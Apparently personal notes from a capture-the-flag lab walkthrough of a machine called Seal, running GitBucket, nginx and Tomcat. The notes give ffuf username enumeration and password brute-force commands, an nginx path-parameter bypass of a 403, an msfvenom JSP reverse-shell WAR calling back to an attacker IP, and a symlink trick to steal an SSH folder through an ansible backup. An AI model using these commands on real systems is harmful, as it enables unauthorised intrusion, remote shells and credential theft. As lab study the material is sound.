Seal
Register a new account at gitbucket
Bruteforce
ffuf -u http://10.10.10.250:8080/register/validate -X POST -d "userName=FUZZ&password=test123&fullName=test&mailAddress=test&extraMailAddresses%5B0%5D=test&extraMailAddresses%5B1%5D=&url=&description=&fileId=" -w ../userlist.txt -mr already -s -H "Content-Type: application/x-www-form-urlencoded;"
Valid usernames alex root luis
ffuf -u http://10.10.10.250:8080/signin -X POST -d "userName=root&password=FUZZ&hash=" -w ../rockyou.txt -fr signin -s -H "Content-Type: application/x-www-form-urlencoded;"
Remove mutual authentication, setup registration and login features
<user username="tomcat" password="[redacted]" roles="manager-gui,admin-gui"/>
Bypass nginx reverse proxy 403 [nginx -> tomcat]
https://10.10.10.250/manager;a=b/html/ https://10.10.10.250/manager/;a=b/html/upload?org.apache.catalina.filters.CSRF_NONCE=B07EF0732BE104396355D26DD2A56CEE [upload war file]
msfvenom --list payloads | grep -ie war
msfvenom -p java/jsp_shell_reverse_tcp -f war LHOST=10.10.14.76 LPORT=7901 -o shell.war
tty shell python3 -c 'import pty; pty.spawn("/bin/bash")'
Create a soft link ln -s /home/luis/.ssh /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/ressurect
ansible run.yml format: zip mode: 0777
ansible if being run by root, create a soft link ln -s of ssh folder and create a zip archive
-----------------------------------------------------------------------
Path:
ā¢ bruteforce root login?
ā¢ edit nginx config file to bypass 403
ā¢ bypass nginx
ā¢ upload war file on tomcat manager to gain reverse shell [root flag]
ā¢ how is registration happening at gitbucket
Last updated